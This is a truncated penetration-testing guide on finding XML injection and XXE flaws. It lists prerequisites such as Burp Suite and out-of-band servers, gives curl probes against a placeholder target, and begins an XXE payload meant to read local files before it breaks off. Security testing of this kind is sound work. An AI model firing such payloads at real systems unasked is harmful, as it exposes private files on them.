testing-for-xml-injection-vulnerabilities

# Testing for XML Injection Vulnerabilities ## When to Use - When testing applications that process XML input (SOAP APIs, XML-RPC, file uploads) - During penetration testing of applications with XML parsers - When assessing SAML-based authentication implementations - When testing file import/export functionality that handles XML formats - During API security testing of SOAP or XML-based web services ## Prerequisites - Burp Suite with XML-related extensions (Content Type Converter, XXE Scanner) - XMLLint or similar XML validation tools - Understanding of XML structure, DTDs, and entity processing - Python 3.x with lxml and requests libraries - Access to an out-of-band interaction server (Burp Collaborator, interact.sh) - Sample XXE payloads from PayloadsAllTheThings repository ## Workflow ### Step 1 — Identify XML Processing Endpoints ```bash # Look for endpoints accepting XML content types # Content-Type: application/xml, text/xml, application/soap+xml # Check WSDL files for SOAP services curl -s http://target.com/service?wsdl # Test if endpoint accepts XML by changing Content-Type curl -X POST http://target.com/api/data \ -H "Content-Type: application/xml" \ -d '<?xml version="1.0"?><root><test>hello</test></root>' # Check for XML file upload functionality # Look for .xml, .svg, .xlsx, .docx file processing ``` ### Step 2 — Test for Basic XXE (File Retrieval) ```xml <!-- Basic XXE to read local files --> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!E...